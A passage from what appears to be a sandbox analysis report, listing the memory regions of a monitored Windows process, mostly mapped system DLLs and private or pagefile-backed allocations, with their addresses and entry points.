end_va = 0x7fefb37afff
monitored = 0
entry_point = 0x7fefb374f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 512
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 513
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 514
start_va = 0x7fefb8e0000
end_va = 0x7fefb950fff
monitored = 0
entry_point = 0x7fefb91ecc4
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 515
start_va = 0x7fefb9f0000
end_va = 0x7fefba04fff
monitored = 0
entry_point = 0x7fefb9f1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 516
start_va = 0x7fefba10000
end_va = 0x7fefba1bfff
monitored = 0
entry_point = 0x7fefba118a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 517
start_va = 0x7fefba20000
end_va = 0x7fefba35fff
monitored = 0
entry_point = 0x7fefba211a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 518
start_va = 0x7fefbb50000
end_va = 0x7fefbb60fff
monitored = 0
entry_point = 0x7fefbb51070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 519
start_va = 0x7fefbb80000
end_va = 0x7fefbca9fff
monitored = 0
entry_point = 0x7fefbb83810
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")
Region:
id = 520
start_va = 0x7fefbcb0000
end_va = 0x7fefbce4fff
monitored = 0
entry_point = 0x7fefbcb1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 521
start_va = 0x7fefbcf0000
end_va = 0x7fefbd07fff
monitored = 0
entry_point = 0x7fefbcf1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 522
start_va = 0x7fefbdb0000
end_va = 0x7fefbdf2fff
monitored = 0
entry_point = 0x7fefbdbc168
region_type = mapped_file
name = "duser.dll"
filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll")
Region:
id = 523
start_va = 0x7fefbe00000
end_va = 0x7fefbef1fff
monitored = 0
entry_point = 0x7fefbe2ac20
region_type = mapped_file
name = "dui70.dll"
filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll")
Region:
id = 524
start_va = 0x7fefbf00000
end_va = 0x7fefc114fff
monitored = 0
entry_point = 0x7fefc0d64b0
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")
Region:
id = 525
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 526
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 527
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 528
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 529
start_va = 0x7fefcd00000
end_va = 0x7fefcd4bfff
monitored = 0
entry_point = 0x7fefcd07950
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 530
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 531
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 532
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 533
start_va = 0x7fefd5c0000
end_va = 0x7fefd5e2fff
monitored = 0
entry_point = 0x7fefd5c1198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 534
start_va = 0x7fefd660000
end_va = 0x7fefd66afff
monitored = 0
entry_point = 0x7fefd661030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 535
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 536
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 537
start_va = 0x7fefd770000
end_va = 0x7fefd7acfff
monitored = 0
entry_point = 0x7fefd7718f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 538
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 539
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 540
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 541
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 542
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 543
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 544
start_va = 0x7fefd9f0000
end_va = 0x7fefda2afff
monitored = 0
entry_point = 0x7fefd9f1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 545
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 546
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 547
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 548
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 549
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 550
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 551
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 552
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 553
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 554
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 555
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 556
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 557
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 558
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 559
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 560
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 561
start_va = 0x7feff730000
end_va = 0x7feff7c6fff
monitored = 0
entry_point = 0x7feff7313e8
region_type = mapped_file
name = "comdlg32.dll"
filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll")
Region:
id = 562
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 563
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 564
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 565
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 566
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 567
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 568
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 569
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 570
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 571
start_va = 0x7fffff72000
end_va = 0x7fffff73fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff72000"
filename = ""
Region:
id = 572
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 573
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 574
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 575
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 576
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 577
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 578
start_va = 0x7fffff80000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 579
start_va = 0x7fffff90000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 580
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 581
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 582
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 583
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 584
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 585
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 586
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 587
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 588
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 589
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 590
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 591
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 592
start_va = 0x7fffffda000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 593
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 594
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 595
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 596
start_va = 0xa2d0000
end_va = 0xa3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a2d0000"
filename = ""
Region:
id = 597
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 598
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 599
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 600
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 601
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 602
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 603
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 604
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 605
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 606
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 607
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 608
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 609
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 610
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 611
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 612
start_va = 0xaf80000
end_va = 0xb07ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000af80000"
filename = ""
Region:
id = 613
start_va = 0xb080000
end_va = 0xb17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b080000"
filename = ""
Region:
id = 614
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 615
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 616
start_va = 0x7fef6fe0000
end_va = 0x7fef717bfff
monitored = 0
entry_point = 0x7fef6fe1030
region_type = mapped_file
name = "networkexplorer.dll"
filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll")
Region:
id = 617
start_va = 0x9d90000
end_va = 0x9e90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009d90000"
filename = ""
Region:
id = 618
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 619
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 620
start_va = 0x9d90000
end_va = 0x9e8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009d90000"
filename = ""
Region:
id = 621
start_va = 0xa6f0000
end_va = 0xa7effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6f0000"
filename = ""
Region:
id = 622
start_va = 0xb250000
end_va = 0xb34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b250000"
filename = ""
Region:
id = 623
start_va = 0xb390000
end_va = 0xb48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b390000"
filename = ""
Region:
id = 624
start_va = 0x7fffff64000
end_va = 0x7fffff65fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff64000"
filename = ""
Region:
id = 625
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 626
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 627
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 628
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 629
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 630
start_va = 0x719b0000
end_va = 0x72d05fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 631
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui")
Region:
id = 632
start_va = 0x7fef29b0000
end_va = 0x7fef2a71fff
monitored = 0
entry_point = 0x7fef29b102c
region_type = mapped_file
name = "mssvp.dll"
filename = "\\Windows\\System32\\mssvp.dll" (normalized: "c:\\windows\\system32\\mssvp.dll")
Region:
id = 633
start_va = 0x7fef72a0000
end_va = 0x7fef72bafff
monitored = 0
entry_point = 0x7fef72a2fa0
region_type = mapped_file
name = "mapi32.dll"
filename = "\\Windows\\System32\\mapi32.dll" (normalized: "c:\\windows\\system32\\mapi32.dll")
Region:
id = 634
start_va = 0x6ec0000
end_va = 0x6ec1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mssvp.dll.mui"
filename = "\\Windows\\System32\\en-US\\mssvp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mssvp.dll.mui")
Region:
id = 635
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 636
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 637
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 638
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 639
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 640
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 641
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 642
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
